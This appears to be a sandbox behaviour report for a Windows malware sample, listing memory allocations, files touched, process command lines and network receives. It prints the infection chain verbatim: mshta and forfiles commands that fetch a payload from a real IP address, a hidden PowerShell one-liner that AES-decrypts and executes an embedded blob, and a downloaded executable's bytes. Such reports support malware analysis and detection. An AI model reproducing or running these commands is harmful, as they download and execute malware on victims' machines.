protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ee000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049ef000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2232
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\TopNotchSetupPacket.pdf
file C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk
file C:\Users\test22\AppData\Local\Temp\SetupPacket.pdf.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Word 2013.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk
file C:\Windows\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk
cmdline "C:\Windows\system32\mshta.exe" http://212.18.104.197/SetupPacket
cmdline "C:\Windows\System32\forfiles.exe" /p C:\Windows /m win.ini /c "powershell . mshta http://212.18.104.197/SetupPacket"
cmdline powershell.exe -w 1 -ep Unrestricted -nop function pgfjld($PGNrUcfE){return -split ($PGNrUcfE -replace '..', '0x$& ')};$KSZkdseY = pgfjld('BD984A0FC850BB44442AB135AD00799F795CFD9782453AD5D65AD8AC7511FF49D6DDDBC7D2B967E73CCFE2DBD48BC75AA261C7ACCD18C46967A73C81595FA81ABAC490F2F226E0251A513A4B21E66B2A6371DE32E243D9E1FCEEA18171DB485AA84154335973B76C09FFB7E823CAA4C1375575D0FEDEF352B4FCBC5473F6870A50F66D68AF3202EFB9BF7005FDB10135E712D570B5D6D0B7AAC5D11854E38181A9C470D177AC65A6954DE07D80DA0F6E83115F07461A9518778A968F10C5C931BD3594178DF5302D23589E14199DFA5181080383BD4D628FE9BE599155260F684C139F1D4F408F22CFF8AED6806BA3DA58371A40D3D2732A024CE5A6C931D63E55FDBD23AB9A57EA14D19EF63873994C5E444B43BC89DAC972500EA7BD2ECB3D2F81AF0D0EA29833CACEBDAE6B6B1D4E25B48D58588328BF188F29DBCB379A72E161066FD34621F72D68D5530F37C85A61B6AC673FDE6A01FF74B52C6998219D26D6DBBFC26293BBE6FDEF85F4A09824742858EEA1EB9CEECB8D81986F4166A8874DFD622FFD402AC6882AC4AD710A378C7168D6B2EA044323611D399C994ACF4603926DAF52C623CB16CAC1D7C16DB58B5FA1D31F7D8C2FB4480382E1FC23B5F9B5B66D573F90A9B258485299C2596FE82B36E3C7326CB52F66C6EAFC6D3EC454540970BE8C1CF87D605B2DBAFAF2D510A905A0BFB808FE75945350C83DB1818772DCF19D80538295F61D8E9D3533EA678C3F7D6E2DC324C9D730DB9E656868BB9B709552880B18262A46F7E94DB280B7FA058FDC076E752E7FF6661D9F09B9E53F175F2FD3C10B5D9188041FA5D6528660679C9FE79581222A6085EBE13A485BE1DE0A931A5E033DD0454B961EC6335C85040D6E4E2A52AAEF3E2CC86B0BEB51BF9FC90CE3CFD976A9B98CE872A8DA2CE6109CF1E5820DE57F4E8330C4E72455878508B3E5E66106BA62319AD62B4EEDCC3C0941E4E079D47796433B3A50DD0E37FA3D3C5098CD81EA9C9B88444E80EC5CBD3D013B194B9469DB44A4FCBDE1D3725078344CE1B3E662664F431F0995AB5FAC20FD2F3D4ECA9B9BC698488920884EC721EAD479726F1B066D93FD0964DA08B00D266DC7CFC23B886022E11553E9490BFE661AC4C595009695D3B528350460481543CB98715E4F835875914FE5AEBBA37F97D416B229EAFFD9632D85743AD504FF5F0A62BDDDA073A7B73FB9892606DA003F4FB0DA04B07FF8EFC54F1BE308CA1016E6FAA3309E00A5675411B212225C318DE27FE256671B0160FEF7400D7D8061919DC03ACEEEF58A642865B0787AEC57D4BD08971385313CF742DC639EC6B73F5C3E8CEC7C58E5E46D2CA19E8ED839E44D0D1C7EC63831699E034E4E168D4169B54E1401021A157055EED8152216E819ABF15CBAD706EA9EF845663DE3DD8780F0B7D5B9412ACFF1703134B29701021750F36342107190ECF305A42153FBB1112EC001A667060D19CF78C11E6556C1CCD1A7F928A485E07756716E4BB48772F16395960ACBA41B4CCFFD751EAC7058B9641FE34CA280A852F2C890536A55164615E7C78EACEAC039DAD58C2645D6FC6AFA9B1F0FDE4DA75160A4D11F2F69A7F7E36C2333DA9716CACAB0FB448B429689CB636FC54F37862D743C6A176E6C08956C6890E2E653A5A365E628F05310712F2E4D68F30EEE1B76FFAFC8B0148B386D496033F1D4B0A2F07C9D1CA3F587A3FD29AA491F720996C7FE6E230D2567EA102E9F66BFC765A3B009E1E001FCA56127D35681725C431A1726CEBFADE1FB20D62605846A83429E8A692E0C1C96BC9041876FBBF1B53A05A6BCFD234D7A5438A6072F4D472C5D17C5E0E853A023DA66B8B263B9794BDF8D8A61D609F9C1480BC7F7B2A0D3E097B26F3F476AAAB419D29CE99A04E9204EBAE2ED0F6F74');$dXtUn = [System.Security.Cryptography.Aes]::Create();$dXtUn.Key = pgfjld('74474F76576A4554674472586F625872');$dXtUn.IV = New-Object byte[] 16;$qwmdrLPB = $dXtUn.CreateDecryptor();$kWgRZUeAP = $qwmdrLPB.TransformFinalBlock($KSZkdseY, 0, $KSZkdseY.Length);$FsJGITdVz = [System.Text.Encoding]::Utf8.GetString($kWgRZUeAP);$qwmdrLPB.Dispose();& $FsJGITdVz.Substring(0,3) $FsJGITdVz.Substring(3)
cmdline . mshta http://212.18.104.197/SetupPacket
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function pgfjld($PGNrUcfE){return -split ($PGNrUcfE -replace '..', '0x$& ')};$KSZkdseY = pgfjld('BD984A0FC850BB44442AB135AD00799F795CFD9782453AD5D65AD8AC7511FF49D6DDDBC7D2B967E73CCFE2DBD48BC75AA261C7ACCD18C46967A73C81595FA81ABAC490F2F226E0251A513A4B21E66B2A6371DE32E243D9E1FCEEA18171DB485AA84154335973B76C09FFB7E823CAA4C1375575D0FEDEF352B4FCBC5473F6870A50F66D68AF3202EFB9BF7005FDB10135E712D570B5D6D0B7AAC5D11854E38181A9C470D177AC65A6954DE07D80DA0F6E83115F07461A9518778A968F10C5C931BD3594178DF5302D23589E14199DFA5181080383BD4D628FE9BE599155260F684C139F1D4F408F22CFF8AED6806BA3DA58371A40D3D2732A024CE5A6C931D63E55FDBD23AB9A57EA14D19EF63873994C5E444B43BC89DAC972500EA7BD2ECB3D2F81AF0D0EA29833CACEBDAE6B6B1D4E25B48D58588328BF188F29DBCB379A72E161066FD34621F72D68D5530F37C85A61B6AC673FDE6A01FF74B52C6998219D26D6DBBFC26293BBE6FDEF85F4A09824742858EEA1EB9CEECB8D81986F4166A8874DFD622FFD402AC6882AC4AD710A378C7168D6B2EA044323611D399C994ACF4603926DAF52C623CB16CAC1D7C16DB58B5FA1D31F7D8C2FB4480382E1FC23B5F9B5B66D573F90A9B258485299C2596FE82B36E3C7326CB52F66C6EAFC6D3EC454540970BE8C1CF87D605B2DBAFAF2D510A905A0BFB808FE75945350C83DB1818772DCF19D80538295F61D8E9D3533EA678C3F7D6E2DC324C9D730DB9E656868BB9B709552880B18262A46F7E94DB280B7FA058FDC076E752E7FF6661D9F09B9E53F175F2FD3C10B5D9188041FA5D6528660679C9FE79581222A6085EBE13A485BE1DE0A931A5E033DD0454B961EC6335C85040D6E4E2A52AAEF3E2CC86B0BEB51BF9FC90CE3CFD976A9B98CE872A8DA2CE6109CF1E5820DE57F4E8330C4E72455878508B3E5E66106BA62319AD62B4EEDCC3C0941E4E079D47796433B3A50DD0E37FA3D3C5098CD81EA9C9B88444E80EC5CBD3D013B194B9469DB44A4FCBDE1D3725078344CE1B3E662664F431F0995AB5FAC20FD2F3D4ECA9B9BC698488920884EC721EAD479726F1B066D93FD0964DA08B00D266DC7CFC23B886022E11553E9490BFE661AC4C595009695D3B528350460481543CB98715E4F835875914FE5AEBBA37F97D416B229EAFFD9632D85743AD504FF5F0A62BDDDA073A7B73FB9892606DA003F4FB0DA04B07FF8EFC54F1BE308CA1016E6FAA3309E00A5675411B212225C318DE27FE256671B0160FEF7400D7D8061919DC03ACEEEF58A642865B0787AEC57D4BD08971385313CF742DC639EC6B73F5C3E8CEC7C58E5E46D2CA19E8ED839E44D0D1C7EC63831699E034E4E168D4169B54E1401021A157055EED8152216E819ABF15CBAD706EA9EF845663DE3DD8780F0B7D5B9412ACFF1703134B29701021750F36342107190ECF305A42153FBB1112EC001A667060D19CF78C11E6556C1CCD1A7F928A485E07756716E4BB48772F16395960ACBA41B4CCFFD751EAC7058B9641FE34CA280A852F2C890536A55164615E7C78EACEAC039DAD58C2645D6FC6AFA9B1F0FDE4DA75160A4D11F2F69A7F7E36C2333DA9716CACAB0FB448B429689CB636FC54F37862D743C6A176E6C08956C6890E2E653A5A365E628F05310712F2E4D68F30EEE1B76FFAFC8B0148B386D496033F1D4B0A2F07C9D1CA3F587A3FD29AA491F720996C7FE6E230D2567EA102E9F66BFC765A3B009E1E001FCA56127D35681725C431A1726CEBFADE1FB20D62605846A83429E8A692E0C1C96BC9041876FBBF1B53A05A6BCFD234D7A5438A6072F4D472C5D17C5E0E853A023DA66B8B263B9794BDF8D8A61D609F9C1480BC7F7B2A0D3E097B26F3F476AAAB419D29CE99A04E9204EBAE2ED0F6F74');$dXtUn = [System.Security.Cryptography.Aes]::Create();$dXtUn.Key = pgfjld('74474F76576A4554674472586F625872');$dXtUn.IV = New-Object byte[] 16;$qwmdrLPB = $dXtUn.CreateDecryptor();$kWgRZUeAP = $qwmdrLPB.TransformFinalBlock($KSZkdseY, 0, $KSZkdseY.Length);$FsJGITdVz = [System.Text.Encoding]::Utf8.GetString($kWgRZUeAP);$qwmdrLPB.Dispose();& $FsJGITdVz.Substring(0,3) $FsJGITdVz.Substring(3)
file C:\Users\test22\AppData\Roaming\AdeptTranslatorPro_[3MB]_[1sig].exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SetupPacket[1]
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: powershell.exe
parameters: -w 1 -ep Unrestricted -nop function pgfjld($PGNrUcfE){return -split ($PGNrUcfE -replace '..', '0x$& ')};$KSZkdseY = pgfjld('BD984A0FC850BB44442AB135AD00799F795CFD9782453AD5D65AD8AC7511FF49D6DDDBC7D2B967E73CCFE2DBD48BC75AA261C7ACCD18C46967A73C81595FA81ABAC490F2F226E0251A513A4B21E66B2A6371DE32E243D9E1FCEEA18171DB485AA84154335973B76C09FFB7E823CAA4C1375575D0FEDEF352B4FCBC5473F6870A50F66D68AF3202EFB9BF7005FDB10135E712D570B5D6D0B7AAC5D11854E38181A9C470D177AC65A6954DE07D80DA0F6E83115F07461A9518778A968F10C5C931BD3594178DF5302D23589E14199DFA5181080383BD4D628FE9BE599155260F684C139F1D4F408F22CFF8AED6806BA3DA58371A40D3D2732A024CE5A6C931D63E55FDBD23AB9A57EA14D19EF63873994C5E444B43BC89DAC972500EA7BD2ECB3D2F81AF0D0EA29833CACEBDAE6B6B1D4E25B48D58588328BF188F29DBCB379A72E161066FD34621F72D68D5530F37C85A61B6AC673FDE6A01FF74B52C6998219D26D6DBBFC26293BBE6FDEF85F4A09824742858EEA1EB9CEECB8D81986F4166A8874DFD622FFD402AC6882AC4AD710A378C7168D6B2EA044323611D399C994ACF4603926DAF52C623CB16CAC1D7C16DB58B5FA1D31F7D8C2FB4480382E1FC23B5F9B5B66D573F90A9B258485299C2596FE82B36E3C7326CB52F66C6EAFC6D3EC454540970BE8C1CF87D605B2DBAFAF2D510A905A0BFB808FE75945350C83DB1818772DCF19D80538295F61D8E9D3533EA678C3F7D6E2DC324C9D730DB9E656868BB9B709552880B18262A46F7E94DB280B7FA058FDC076E752E7FF6661D9F09B9E53F175F2FD3C10B5D9188041FA5D6528660679C9FE79581222A6085EBE13A485BE1DE0A931A5E033DD0454B961EC6335C85040D6E4E2A52AAEF3E2CC86B0BEB51BF9FC90CE3CFD976A9B98CE872A8DA2CE6109CF1E5820DE57F4E8330C4E72455878508B3E5E66106BA62319AD62B4EEDCC3C0941E4E079D47796433B3A50DD0E37FA3D3C5098CD81EA9C9B88444E80EC5CBD3D013B194B9469DB44A4FCBDE1D3725078344CE1B3E662664F431F0995AB5FAC20FD2F3D4ECA9B9BC698488920884EC721EAD479726F1B066D93FD0964DA08B00D266DC7CFC23B886022E11553E9490BFE661AC4C595009695D3B528350460481543CB98715E4F835875914FE5AEBBA37F97D416B229EAFFD9632D85743AD504FF5F0A62BDDDA073A7B73FB9892606DA003F4FB0DA04B07FF8EFC54F1BE308CA1016E6FAA3309E00A5675411B212225C318DE27FE256671B0160FEF7400D7D8061919DC03ACEEEF58A642865B0787AEC57D4BD08971385313CF742DC639EC6B73F5C3E8CEC7C58E5E46D2CA19E8ED839E44D0D1C7EC63831699E034E4E168D4169B54E1401021A157055EED8152216E819ABF15CBAD706EA9EF845663DE3DD8780F0B7D5B9412ACFF1703134B29701021750F36342107190ECF305A42153FBB1112EC001A667060D19CF78C11E6556C1CCD1A7F928A485E07756716E4BB48772F16395960ACBA41B4CCFFD751EAC7058B9641FE34CA280A852F2C890536A55164615E7C78EACEAC039DAD58C2645D6FC6AFA9B1F0FDE4DA75160A4D11F2F69A7F7E36C2333DA9716CACAB0FB448B429689CB636FC54F37862D743C6A176E6C08956C6890E2E653A5A365E628F05310712F2E4D68F30EEE1B76FFAFC8B0148B386D496033F1D4B0A2F07C9D1CA3F587A3FD29AA491F720996C7FE6E230D2567EA102E9F66BFC765A3B009E1E001FCA56127D35681725C431A1726CEBFADE1FB20D62605846A83429E8A692E0C1C96BC9041876FBBF1B53A05A6BCFD234D7A5438A6072F4D472C5D17C5E0E853A023DA66B8B263B9794BDF8D8A61D609F9C1480BC7F7B2A0D3E097B26F3F476AAAB419D29CE99A04E9204EBAE2ED0F6F74');$dXtUn = [System.Security.Cryptography.Aes]::Create();$dXtUn.Key = pgfjld('74474F76576A4554674472586F625872');$dXtUn.IV = New-Object byte[] 16;$qwmdrLPB = $dXtUn.CreateDecryptor();$kWgRZUeAP = $qwmdrLPB.TransformFinalBlock($KSZkdseY, 0, $KSZkdseY.Length);$FsJGITdVz = [System.Text.Encoding]::Utf8.GetString($kWgRZUeAP);$qwmdrLPB.Dispose();& $FsJGITdVz.Substring(0,3) $FsJGITdVz.Substring(3)
filepath: powershell.exe
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2348
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 16 (PAGE_EXECUTE)
base_address: 0x03c20000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

recv

buffer: HTTP/1.1 200 OK Date: Wed, 31 Jul 2024 00:44:12 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Tue, 30 Jul 2024 11:54:36 GMT ETag: "29e0d-61e75a447d54c" Accept-Ranges: bytes Content-Length: 171533 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $›þö:ߟ˜iߟ˜iߟ˜i;ïhޟ˜i;ï›hޟ˜i;ïœhʟ˜i;ï™hϘiߟ™iZŸ˜i;ïhݟ˜i;ïgiޟ˜i;ïšhޟ˜iRichߟ˜iPELääª,à R8€Xp@ À¿@Á  ‚  °” T¼€.textÌQR `.data€pV@À.idataž €X@@.rsrc f@@.reloc”°x@B
received: 1024
socket: 836
1 1024 0

recv

buffer: cP,bG,ox,UQ,Iy,bG,ox,UQ,ul,bG,ox,cP,MA,bG,ox,Iy,UQ,bG,ox,UQ,MA,bG,ox,Cy,VS,bG,ox,UQ,Jp,bG,ox,MA,ew,bG,ox,UQ,Jp,bG,ox,UQ,cP,bG,ox,Iy,ul,bG,ox,Iy,VS,bG,ox,Jp,MA,bG,cP,VS,ew,bG,ox,cP,UQ,bG,ox,ox,Cy,bG,ox,Cy,MA,bG,ox,Iy,VS,bG,ox,Iy,MA,bG,ox,UQ,UQ,bG,ox,Iy,cP,bG,ox,Cy,ul,bG,ox,Jp,Iy,bG,cP,VS,ox,bG,ox,ul,Jp,bG,ox,Jp,Iy,bG,cP,VS,ox,bG,cP,VS,ew,bG,ox,cP,UQ,bG,ox,ox,Cy,bG,ox,Cy,MA,bG,ox,Iy,VS,bG,ox,Iy,MA,bG,ox,UQ,UQ,bG,ox,Iy,cP,bG,ox,Cy,ul,bG,ox,Jp,ew,bG,ox,cP,ew,bG,ox,Iy,cP,bG,ox,UQ,MA,bG,ox,Iy,Cy,bG,ox,UQ,ew,bG,ox,Iy,Iy,bG,ox,Jp,cP,bG,ox,MA,ul,bG,cP,VS,ew,bG,ox,cP,MA,bG,ox,UQ,UQ,bG,ox,cP,Iy,bG,ox,cP,cP,bG,ox,cP,Cy,bG,ox,ox,Iy,bG,ox,Iy,MA,bG,ox,ox,ew,bG,ox,ew,ox,bG,cP,VS,ox,bG,ox,MA,cP,bG,cP,VS,ox,bG,ox,Cy,cP,bG,ox,ox,Cy,bG,ox,ew,cP,bG,ox,UQ,UQ,bG,ox,UQ,ew,bG,ox,Iy,cP,bG,ox,UQ,ul,bG,ox,Jp,ew,bG,ox,ox,Iy,bG,ox,Iy,cP,bG,ox,ew,MA,bG,ox,UQ,ew,bG,ox,Jp,ew,bG,ox,cP,ul,bG,ox,UQ,MA,bG,ox,Iy,ul,bG,ox,UQ,cP,bG,ox,Iy,MA,bG,ox,Iy,UQ,bG,ox,UQ,MA,bG,ox,Iy,Cy,bG,ox,Cy,Cy,bG,ox,MA,Jp,bG,ox,MA,Jp,bG,ox,ox,UQ,bG,ox,UQ,ew,bG,ox,Iy,ox,bG,ox,ul,ew,bG,ox,Jp,ew,bG,ox,cP,cP,bG,ox,Iy,cP,bG,ox,UQ,ew,bG,ox,ox,Cy,bG,ox,UQ,ew,bG,ox,UQ,Iy,bG,ox,Iy,UQ,bG,ox,UQ,MA,bG,ox,Iy,Cy,bG,ox,Jp,MA,bG,cP,VS,ew,bG,ox,Iy,VS,bG,ox,ox,VS,bG,ox,Iy,Cy,bG,ox,ox,ox,bG,ox,Cy,MA,bG,ox,ox,UQ,bG,ox,Iy,cP,bG,ox,MA,UQ,bG,ox,ox,MA,bG,ox,Jp,cP,bG,ox,MA,ul,bG,cP,VS,ew,bG,ox,UQ,Cy,bG,ox,ew,ul,bG,ox,UQ,ul,bG,ox,Iy,MA,bG,ox,UQ,Iy,bG,ox,cP,ew,bG,ox,ox,MA,bG,ox,MA,ew,bG,ox,Jp,ew,bG,ox,cP,Jp,bG,ox,Iy,UQ,bG,ox,UQ,UQ,bG,ox,UQ,ox,bG,ox,UQ,cP,bG,ox,UQ,UQ,bG,ox,Iy,cP,bG,ox,Jp,MA,bG,ox,Jp,cP,bG,ox,MA,ul,bG,ox,Jp,Jp,bG,cP,VS,ox,bG,cP,VS,ew,bG,ox,cP,MA,bG,ox,UQ,UQ,bG,ox,cP,Iy,bG,ox,cP,cP,bG,ox,cP,Cy,bG,ox,ox,Iy,bG,ox,Iy,MA,bG,ox,ox,ew,bG,ox,ew,ox,bG,ox,Jp,ew,bG,ox,ox,Cy,bG,ox,UQ,VS,bG,ox,Iy,Jp,bG,ox,UQ,UQ,bG,ox,UQ,ew,bG,ox,UQ,Iy,bG,ox,Iy,UQ,bG,ox,UQ,MA,bG,ox,Iy,Cy,bG,ox,Jp,MA,bG,ox,ul,Jp,bG,ox,Jp,Iy,bG,ox,ul,cP,bG,ox,Jp,cP,bG,cP,VS,ox,bG,cP,VS,ew,bG,ox,cP,MA,bG,ox,UQ,UQ,bG,ox,cP,Iy,bG,ox,cP,cP,bG,ox,cP,Cy,bG,ox,ox,Iy,bG,ox,Iy,MA,bG,ox,ox,ew,bG,ox,ew,ox,bG,ox,Jp,ew,bG,ox,ox,Cy,bG,ox,UQ,VS,bG,ox,Iy,Jp,bG,ox,UQ,UQ,bG,ox,UQ,ew,bG,ox,UQ,Iy,bG,ox,Iy,UQ,bG,ox,UQ,MA,bG,ox,Iy,Cy,bG,ox,Jp,MA,bG,ox,ul,cP,bG,ox,Jp,cP,BF,uf,Mb,ta,WB,fj,PU,vD,fj,kS,PU,dY,PU,Oy,wQ,yq,UE,eY,ox,ox,VS,bG,ox,ox,Cy,bG,ox,Iy,ul,bG,ox,UQ,Iy,bG,ox,Iy,UQ,bG,ox,UQ,ox,bG,ox,UQ,ew,bG,ox,Jp,ew,bG,ox,ox,Cy,bG,ox,Iy,Iy,bG,ox,Iy,cP,bG,ox,UQ,Jp,bG,ox,UQ,Jp,BF,uf,Mb,ta,WB,fj,PU,to,no,Fu,PU,dY,PU,no,Fu,Jc,PU,to,cq,ja,Wc,ta,Fu,OX,hd,rn,nq,Fu,cq,ja,UE,vD,fj,kS,uf,Mb,to,no,Fu,sh,SO,fU,no,UE,Jc,cB,cH,bG,PU,Jp,bG,PU,ja,fj,fU,Fu,uf,Mb) </script>MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $›þö:ߟ˜iߟ˜iߟ˜i;ïhޟ˜i;ï›hޟ˜i;ïœhʟ˜i;ï™hϘiߟ™iZŸ˜i;ïhݟ˜i;ïgiޟ˜i;ïšhޟ˜iRichߟ˜iPELääª,à R8€Xp@ À¿@Á  ‚  °” T¼€.textÌQR `.data€pV
received: 3101
socket: 836
1 3101 0
